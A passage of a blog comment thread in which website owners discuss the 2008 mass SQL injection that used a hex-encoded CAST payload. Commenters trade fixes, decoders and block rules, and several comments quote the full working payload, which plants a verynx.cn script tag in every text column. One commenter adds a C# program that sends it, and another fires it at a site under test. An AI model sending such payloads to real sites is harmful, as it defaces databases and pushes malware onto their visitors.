    CLOSE Table_Cursor;
    DEALLOCATE Table_Cursor;

  45. David Says:

    Looks like my message got cut off. My question was whether the solution would work for SQL SERVER 2005 or just SQL SERVER 2000?

  46. vabuk Says:

    Nice article. But where can I get more about input attack in a search box?

    thanks

  47. Tom39 Says:

    I came across this exploit attempt in my server logs today, and spent the day investigating. While I wasn’t negatively impacted by the exploit, one thing is still VERY puzzling to me:

    Marc Funaro (poster #5 above) indicated that he was able to stop the exploits cold by using ISAPI ReWrite (ISRW) to check for the presence of things like “CAST(4000)” in the URL, etc. I had the same idea, and for some reason, this approach doesn’t work on my end — which is what’s puzzling me… (Server is W2K3, IIS6).

    As a test, I put a ReWrite rule in place to redirect any and all requests to my site to a bogus URL like fofofoxoxoxo.com. I then pointed a browser (both IE and FF) to the URL in question:

    http://www.mysite.com/Index.htm?'DECLARE%20@S%20CHAR(4000)…EXEC(@S);

    The browsers each sat there for a few minutes, and then timed out. Odd. I chopped the URL down to only:

    http://www.mysite.com/Index.htm?'DECLARE%20@S%20CHAR(4000)

    and I was redirected as per my ISRW rule.

    My next thought was that perhaps the browsers were getting tripped up with the multiple @ signs in there, trying to resolve some other IP address using the long 0x… CAST as the address. So, I then whipped up a quick C# program to perform the GET requests and dump back the output. Now things got VERY strange…

    With the ISRW rule in place still redirecting ALL requests to mysite.com to fofofoxoxo.com, sending the SQL injection request via my C# app still caused the request to timeout, as if something on the server was trying to do something with the request before any of the ISAPI filters. I confirmed that ISAPI_REWRITE was the first filter in the execution chain, and it was(is). So — what the heck is the server doing with the request?

    I continued to send variations of the SQL inject string to the server, including:

    * One in which I changed CAST to XAST and EXEC to QXEC. Everything else was the same. This request did NOT timeout on the server!

    * One in which I changed the contents of the CAST(…) from 0x4445435… to 0x11111… (same length data). This request did NOT timeout on the server!

    * Several in which I progressively chopped pieces off the end of the CAST(…) data. After the string got sufficiently short (the exact length, I don’t recall), these requests stopped timing out on the server.

    All of this has left me quite puzzled. With ISAPI_REWRITE being the first filter in my list, what exactly is going on on the server end that causes the request to timeout for the SQL inject request in question? Even with a rule in place to redirect ALL requests elsewhere, some requests (like the SQL inject) never get processed. WHY? What is going on?

    For reference, here is the C# source for those interested in trying it themselves (replace mysite.com with your own site.)


  48. Tom39 Says:

    C# app code above got truncated due to the line with the de-encoded CAST(…) string. Here’s the app again, without that line. Sorry about that.

    —-

    using System;
    using System.Net.Sockets;
    public class Client
    {
    static public void pause()
    {
    Console.WriteLine( "\r\n***** Done *****\r\n" );
    Console.ReadKey();
    }

    static public void Main(string[] Args)
    {
    TcpClient socketForServer;
    try
    {
    socketForServer = new TcpClient("www.mysite.com", 80);
    }
    catch
    {
    Console.WriteLine("Failed to connect to server at {0}:80", "www.mysite.com");
    pause();
    return;
    }
    NetworkStream networkStream = socketForServer.GetStream();
    System.IO.StreamReader streamReader =
    new System.IO.StreamReader(networkStream);
    System.IO.StreamWriter streamWriter =
    new System.IO.StreamWriter(networkStream);
    try
    {
    string outputString;
    // read the data from the host and display it
    {

    //streamWriter.WriteLine("GET / HTTP/1.1\r\nHost: http://www.mysite.com\r\n\r\n");
    //SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529
    //2C40432076617263686172283430303029204445434C415245205461626C655F
    //437572736F7220435552534F5220464F522073656C65637420612E6E616D652C
    //622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C75
    //6D6E73206220776865726520612E69643D622E696420616E6420612E78747970
    //653D27752720616E642028622E78747970653D3939206F7220622E787479706
    //53D3335206F7220622E78747970653D323331206F7220622E78747970653D313
    //63729204F50454E205461626C655F437572736F72204645544348204E4558542
    //046524F4D20205461626C655F437572736F7220494E544F2040542C404320574
    //8494C4528404046455443485F5354415455533D302920424547494E206578656
    //32827757064617465205B272B40542B275D20736574205B272B40432B275D3D5
    //B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633
    //D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736
    //3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696
    //B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
    //03A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743
    //E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4
    //37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
    //55F437572736F72204445414C4C4F43415445205461626C655F437572736F72%
    //20AS%20CHAR(4000));EXEC(@S);

    // Hangs:
    //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524
    //5204054207661726368617228323535292C4043207661726368617228343030
    //3029204445434C415245205461626C655F437572736F7220435552534F52204
    //64F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737
    //9736F626A6563747320612C737973636F6C756D6E7320622077686572652061
    //2E69643D622E696420616E6420612E78747970653D27752720616E642028622
    //E78747970653D3939206F7220622E78747970653D3335206F7220622E787479
    //70653D323331206F7220622E78747970653D31363729204F50454E205461626
    //C655F437572736F72204645544348204E4558542046524F4D20205461626C65
    //5F437572736F7220494E544F2040542C4043205748494C45284040464554434
    //85F5354415455533D302920424547494E20657865632827757064617465205B
    //272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272
    //7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61
    //62632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2
    //D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C
    //2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E7
    //66572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727
    //294645544348204E4558542046524F4D20205461626C655F437572736F72204
    //94E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
    //72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHA
    //R(4000));EXEC(@S);”;

    // Does not hang:
    //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41
    //5245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));";

    // Does not hang, despite being same length as the long query above.
    //String inject_str = “GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    //XXXXXX”;

    // Does not hang (only minor mods to long query).
    //String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C4
    //15245204054207661726368617228323535292C40432076617263686172283430303029204
    //445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637
    //420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736
    //36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653
    //D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722
    //0622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626
    //C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736
    //F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30292
    //0424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404
    //32B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263
    //3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736372697074
    //3E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2
    //F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782
    //E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542
    //046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4
    //F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4375727
    //36F72%20AS%20AHAR(4000));QXEC(QS);”;

    // Does not hang, despite being same length as original, with only the
    // CAST(…) contents changed.
    //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444444444444444444444444444444444444
    //4444444444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);”;

    String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C"
    + "415245204054207661726368617228323535292C40432076617263686172283"
    + "430303029204445434C415245205461626C655F437572736F7220435552534F"
    + "5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D"
    + "207379736F626A6563747320612C737973636F6C756D6E7320622077686572"
    + "6520612E69643D622E696420616E6420612E78747970653D27752720616E642"
    + "028622E78747970653D3939206F7220622E78747970653D3335206F7220622E"
    + "78747970653D323331206F7220622E78747970653D31363729204F50454E205"
    + "461626C655F437572736F72204645544348204E4558542046524F4D20205461"
    + "626C655F437572736F7220494E544F2040542C4043205748494C45284040464"
    + "55443485F5354415455533D302920424547494E206578656328277570646174"
    + "65205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275"
    + "D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A"
    + "2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3"
    + "C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725"
    + "223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616"
    + "2632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D"
    + "272727294645544348204E4558542046524F4D20205461626C655F437572736"
    + "F7220494E544F2040542C404320454E4420434C4F5345205461626C655F4375"
    + "72736F72204445414C4C4F43415445205461626C655F437572736F72%20AS"
    + "%20CHAR(4000));EXEC(@S);";

    // Host carries the bare host name (no scheme); Connection: close asks the
    // server to drop the socket after its reply instead of keeping it open.
    String final_str = inject_str + " HTTP/1.1\r\nHost: www.mysite.com\r\nConnection: close\r\n\r\n";

    Console.WriteLine(final_str);
    streamWriter.WriteLine( final_str );
    streamWriter.Flush();

    for (; ; )
    {
    if (streamReader.Peek() != -1)
    {
    outputString = streamReader.ReadLine();
    if (outputString != null)
    {
    Console.WriteLine(outputString);
    }
    else
    {
    break;
    }
    }
    else
    {
    break;
    }
    }
    }
    }
    catch
    {
    Console.WriteLine("Exception reading from Server");
    pause();
    }
    // tidy up
    networkStream.Close();
    pause();
    }

    }

  49. Tom39 Says:

    Tom39 here again… After digging some more, something else is interesting here… When I manually send the “real” SQL injection string (the one that “hangs” in the code in my previous post), not only does the request time out, but the server log never even shows the request came in. Could it be that something between my network and my server’s network is actually looking for this exact request string and filtering it? Very bizarre…

    -Tom39

  50. devit Says:

    Tom39 that sounds very strange. Perhaps there’s a timeout set on the server and the queries are exceeding that time? Did you try running them with SQL Enterprise Manager?

    vabuk: We think you're asking for more information on preventing the attack. Essentially, what you need to do is, when the search button is clicked and you take the text in from the input box, ensure that text is safe. Otherwise passing it to your database server would make you vulnerable to various forms of input attacks.

    Example: If you're doing something like Select * from Content where body like '%searchText%'; then you would be at risk for an attack, as all the attacker would have to do is pass in a single quote and a semicolon to escape your current query and pass in their own query.

  51. Tom39 Says:

    devit: That’s just it — nothing is ever executing the queries (any query). That is, my http://www.mysite.com site has no dynamic pages — the default document is a static .htm file. As such, there is no “risk” of an injection attack, because nothing is ever being done with any database… which is why I’m so puzzled here! While I haven’t taken the time to use a network traffic analyzer and look to see if the server is actually receiving the packets, the summed-up scenario on my end is:

    * Have a site, http://www.mysite.com.

    * Site consists of only a single test page, pure HTML, nothing dynamic. Default (only) document is an .htm extension (Index.htm). No database access, no nothing.

    * Pointing a browser to [or even making a programmatic (C#) GET request to] http://www.mysite.com/Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4
    445434C415245204054207661726368617228323535292C404320766172636861722834303030
    29204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656
    37420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C73797363
    6F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D277
    52720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78
    747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F43757
    2736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
    2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657
    865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B4043
    2B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61626
    32E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657265
    20272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207
    372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970
    743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7
    220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
    4C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

    hangs the request (i.e., the browser/C# app/etc. sit there for minutes, and then time out).

    * Pointing a browser/app to
    http://www.mysite.com/Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    444444444444444444444444444444444444444444444444444444444444444444444444444444
    4444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);

    does NOT time out. Same length data, same format, etc. Just different contents of CAST(…). But, then the real question is: WHY does this matter? If nothing is being done with the query string, why does one hang and the other not?

    I’d be curious to know if anyone else experiences the same thing if they try the same two query strings on their server.

    Any feedback is welcomed.

  52. Ricardo Parente » Post Topic » SQL Injection Hack using CAST from 1.verynx.cn Says:

    [...] There is another excellent article with examples by Devit!. [...]

  53. Iain Says:

    Hi there folks.

    This blog has been very informative. Thanks everyone for the interesting information. My site got hit by this 4 times over 4 weeks. Usually mid morning (EST) on a Friday. I’m bracing for tomorrow.

    After the first attack, I went and bought a set of repair scripts from PortableGeek, which were great. I wish I’d known about this blog though.

    I have 2 questions though.

    Question 1:

    For CF, I’m seeing use of the cfqueryparam recommended a lot. I haven’t done this much, but I do a check on any numeric param that gets passed to a sql statement. I use isNumeric to see if it’s a number. If it is, then I pass it through. If it isn’t, I cfset the param to 0 (zero) and then I don’t execute the sql query at all, and return an error.

    Is this still vulnerable?

    Question 2:

    It’s hard to remove EXEC permission from my sql user because I use stored procs. Should I redo all my code to use plain sql statements instead of stored procs?

    thanks

  54. devit Says:

    Iain:

    #1 – No – if you’re verifying it's a number then only a number can be passed through.

    #2 – No – Remember to validate the data before you pass it to your stored procedures – if you have stored procedures that are accepting text from a “post” or a “get” variable you’ll want to ensure you’re cleaning that text. (Remember: It’s best to only allow specific characters (a-z, 0-9, spaces, commas, etc.) and strip all other characters as opposed to stripping a specific set of characters you know may be harmful)

    Devit
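    As an added illustration of devit's two replies (the search-box query from his earlier comment and the numeric and allow-list checks here), not code from the post or any commenter: the concatenated LIKE query beside its parameterised form, plus the two validation functions, run against an in-memory SQLite table constructed for the example (the query construction is the same for SQL Server).

```python
"""A search-box query built by concatenation, beside its parameterised form."""
import re
import sqlite3
from typing import List, Optional, Tuple, Union

# devit's allow-list: letters, digits, spaces and commas only, bounded length.
ALLOWED_SEARCH = re.compile(r"[A-Za-z0-9 ,]{1,100}")


def open_sample_db() -> sqlite3.Connection:
    """In-memory table constructed for the example (stands in for Content)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Content (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO Content (body) VALUES (?)", [
        ("red widgets on sale",),
        ("blue widgets, new model",),
        ("internal note: staff pricing",),
    ])
    return conn


def search_unsafe(conn: sqlite3.Connection, search_text: str) -> List[str]:
    """The pattern from the thread: the user's text is spliced into the SQL,
    so a quote in it ends the literal and whatever follows is parsed as SQL."""
    sql = "SELECT body FROM Content WHERE body LIKE '%" + search_text + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, search_text: str) -> List[str]:
    """Parameterised (what cfqueryparam does): the text travels as data only."""
    sql = "SELECT body FROM Content WHERE body LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + search_text + "%",))]


def compare(conn: sqlite3.Connection, search_text: str) -> Tuple[Union[List[str], str], List[str]]:
    """Run both forms; the unsafe one may raise on odd input, so report that."""
    try:
        unsafe: Union[List[str], str] = search_unsafe(conn, search_text)
    except sqlite3.Error as exc:
        unsafe = "error: " + str(exc)
    return unsafe, search_safe(conn, search_text)


def clean_search_text(search_text: str) -> Optional[str]:
    """Allow-list check: accept only the characters you expect and reject the
    rest, rather than stripping a list of characters known to be harmful."""
    return search_text if ALLOWED_SEARCH.fullmatch(search_text) else None


def numeric_param(value: str) -> Optional[int]:
    """Iain's check for ids such as categoryId: digits only, else rejected."""
    return int(value) if re.fullmatch(r"\d{1,9}", value) else None


if __name__ == "__main__":
    db = open_sample_db()
    # A legitimate value with an apostrophe breaks the unsafe query outright;
    # a crafted one widens it to rows the visitor should never see.
    for text in ("widgets", "o'brien", "x' OR 1=1 --"):
        print(repr(text), "->", compare(db, text), "allowed:", clean_search_text(text))
    print(numeric_param("12"), numeric_param("12;SELECT * from tblProducts"))
```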

  55. Richard Says:

    I have a classic ASP website which has been hit several times by this SQL attack through our pages with the ? in the dynamic URL. Would URL re-writing stop the attack?

  56. Agustin Says:

    Hey Tom, I’m a proud C# Developer too :)

    I’m 90% certain your problem is in your ISAPI REWRITE filter.
    Which one are you using BTW?

    It’s not the filter itself, it might be the regex string. You are sending to the rewrite filter a REGEX query that is hanging the filter, probably by accidentally forcing a neverending loop. Regex are tricky, and you have to carefully implement them in a Rewrite Filter.

    It would be lots easier if you drop the ISAPI REWRITE idea and look for the attacking string in the Application_BeginRequest event on the Global.asax file of your ASP.NET application. Solve it there.

    Please drop me a line as I don’t think I’ll be checking this blog often :)

    Sincerely,
    Agustin Garzon

    agustingarzon [ a t ] yahoo [ do t ] com

  57. J.M.M Says:

    Really it is a very good solution, but the ntext type in the db can’t be solved by this query

    DECLARE @T varchar(255),@C varchar(4000)
    DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
    BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''">

  58. Rob Says:

    Obviously good coding following guideline on parameter sanitisation and white listing rather than black listing user supplied content is the best approach however if you have lots of large old systems then rewriting them may not be feasible.

    See

    http://blog.strictly-software.com/2008/09/recovering-from-sql-injection-hack.html

    for a list of plasters that are quick to implement and work (reduced logged hacks by 95%)

    -Deny webuser access to system views such as sysobjects,syscolumns if not required by site.

    -Use a server wide ISAPI URL rewrite ini file to detect and bounce hackers before any application code is run.

    -If you don’t have ISAPI rewrite available then include a global include file that uses similar regular expressions to detect common fingerprints and bounce user to a banned page.

    Also a script to check the database to determine how much data has been affected and either output or run the update statements needed to fix it is at

    http://blog.strictly-software.com/2008/09/script-find-text-in-database.html

    Thanks

  59. Pete Says:

    Found this in the logs. How do I unecrypt it?


  60. devit Says:

    Hey Pete,

An easy way to translate that is to first delete EXEC(@S); and then change all of the %20’s to spaces.

    After that add a print @s; on the end and you should be able to see the results when you execute it.

    Just remember to remove the EXEC(@S); so the script isn’t getting executed on your database server.

    Good Luck.
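The decoding steps devit describes, done offline so nothing is ever executed against the database: this is an added example, not the blog’s or any commenter’s code. It URL-decodes a log line, pulls the hex out of CAST(0x... AS CHAR(...)), turns it back into T-SQL and lists the script URLs the payload would plant; the log line and the script host are constructed, and the UTF-16 branch for NVARCHAR variants is an assumption that goes beyond the CHAR form shown on this page.

```python
"""Decode a CAST(0x...) SQL-injection payload found in a web-server log."""
import re
from urllib.parse import unquote

# Constructed sample: a short payload hex-encoded the same way the attack does.
CONSTRUCTED_SQL = ("DECLARE @T varchar(255);SET @T='</title><script src="
                   "\"http://example.invalid/x.js\"></script><!--'")
CONSTRUCTED_HEX = CONSTRUCTED_SQL.encode("ascii").hex().upper()
CONSTRUCTED_LOG_LINE = (
    "GET /showproducts.aspx?categoryId=12;DECLARE%20@S%20CHAR(4000);"
    f"SET%20@S=CAST(0x{CONSTRUCTED_HEX}%20AS%20CHAR(4000));EXEC(@S);-- 200"
)

# CAST(0x<hex> AS CHAR / VARCHAR / NCHAR / NVARCHAR ...), case-insensitive.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*src=[\"']?([^\"'\s>]+)", re.I)


def decode_cast_payload(log_line):
    """Return the hidden T-SQL from a CAST(0x...) payload, or None if absent."""
    request = unquote(log_line)            # %20 -> space, like devit's step 2
    match = CAST_RE.search(request)
    if not match:
        return None
    raw = bytes.fromhex(match.group(1))
    # Assumption: NVARCHAR variants carry UTF-16LE text, recognisable by the
    # NUL byte that follows every ASCII character.
    if raw[1:2] == b"\x00":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")           # 1:1 byte mapping, never raises


def injected_script_urls(sql):
    """List the external script URLs the decoded payload would write into rows."""
    return SCRIPT_SRC_RE.findall(sql)


if __name__ == "__main__":
    sql = decode_cast_payload(CONSTRUCTED_LOG_LINE)
    print(sql)                             # the readable T-SQL, nothing executed
    print(injected_script_urls(sql))       # hosts to block and to hunt for in the DB
```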

  61. Pete Says:

    Thanks devit

  62. joet Says:

    Help! I’m getting killed! I’ve attempted to have system views blocked but for some reason it won’t take. I can still use them from the web db user account. I’m also dealing with javascript being appended to some files. We’ve been hit five or six times today. File permissions are all read only for internetuser, WUSR and Interactive with write deny set. That hasn’t helped.

I’ve run ClamWin, Windows malware scan, and Malwarebytes on the host machine with updated definitions and none found any virus.

    Also it seems the javascript appends are no longer leaving any sort of record in the logs. (It’s not SQL injection, though we were hit with SQL injection a few days ago) The javascript calls to http://acglgoa.com/h.js

    I’m using ISAPI_Rewrite to filter EXEC( from http requests to stop SQL injection.

    p.s. I’ve found this http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html to be of assistance in translating attacks in hex to ascii.

  63. joet Says:

    So far no successful file append or SQL injection attacks today.

I’ve denied writes to System, Network, Network Service, IIS_WPG, Interactive, Internet Guest Account and Users.

    We haven’t had a successful db attack in a week now.

  64. joet Says:

Hackers are back and were able to overwrite a file despite permissions denying write.

  65. aman Says:

    hi,

This is Aman. My blog is hacked and I want to get it back. Please tell me any solution if you have one. Please help me.

  66. Allen Harkleroad Says:

    We blocked SQL injections at our Cisco router (anything running Cisco IOS should block it). We built a class-map called http-hacks, set it to null route and put:

Match protocol http url "*;DECLARE*"
Match protocol http url "*DECLARE%20*"
Match protocol http url "*=CAST*"

    We applied the class-map to the external facing interface (incoming). You could also apply it on the other interface as well to stop any outgoing attacks if you are worried about such things.

With those in it, the class-map drops all incoming HTTP requests containing those strings. You can do similar for nearly any HTTP request. We did the same thing with the Storm worm crud and a few other things we got tired of script kiddies trying to hit (like cmd.exe, default.ida, etc.)

  67. Adil Nawaz Khan Says:

    Hi All,
I just wanted to share my workaround for this type of SQL injection. I applied security at multiple places. First I created a method which takes the value of the querystring and checks for some malicious text like "Declare", "Cast", "Convert", "Var", "'", ",", "Drop", "Delete", "Update", "Insert", "Create", "Set", "Database". If this function finds any of these malicious codes, it will first get the IP# of the requesting machine and store it in the MaliciousIP table and reject the request by just refreshing the page. Showing some kind of message may provide them some kind of hints which they can make use of.
The IP# which belongs to MaliciousIP would be allowed to enter the same data only two more times, after that it will be blocked forever. Again, no messages. This helps us to frustrate them a bit. And this is what our task is, to frustrate them and make them leave after a wrong attempt.
The third security step I took is using a “Check” constraint. I have some very important tables in my database, which I needed to make sure should not be affected at all. I attached a “Check” constraint with the help of an expression including keywords like "", "/", ".js", "!", "–". These check constraints can reject data coming in with these words.
    Similar kind of security blocks you can follow according to your requirement. I would appreciate suggestions if any is available for this concern.
    Hackers are among us, and we can defeat them, just keep your spirit up.

    Thanks
    Adil

  68. Zaphod Says:

This very selfsame injection attack was the impetus for me writing a new breed of PHP and MySQL website-protecting script, to protect my own website assets.

    I am now sharing the script with the world, licensed GNU/GPL V.2 and it does much more than just detect this attack. It also does IP range banning, hostname banning, keyword banning, and a few other cool tricks to protect your website. Give it an eyeball at http://zaphodb777.dyndns.org/zbblockpage.php , and discuss it at http://zaphodb777.dyndns.org/forum.

    Thanks! :)

  69. niccisweden Says:

    informative for me, like that

    [url=http://www.injectable-filler.com]injectable filler

  70. sandrar Says:

    Hi! I was surfing and found your blog post… nice! I love your blog. :) Cheers! Sandra. R.

  71. sandy Says:

    hi,

I am a QA person and after reading your post I applied the above code to a website created in PHP, which I am testing these days (the server is placed somewhere else).

e.g., http://www.mywebsite.com/home.php?declare ;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+””><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

So how would I know if the changes have taken effect or some error has occurred, since I clicked enter and the normal page opened against that URL of my website under test as if nothing had happened. Please tell me how to check whether something wrong has occurred or not, or tell me of some tool that records and shows what’s happening at the back end.

  72. Dave Says:

    Hi Sandy,

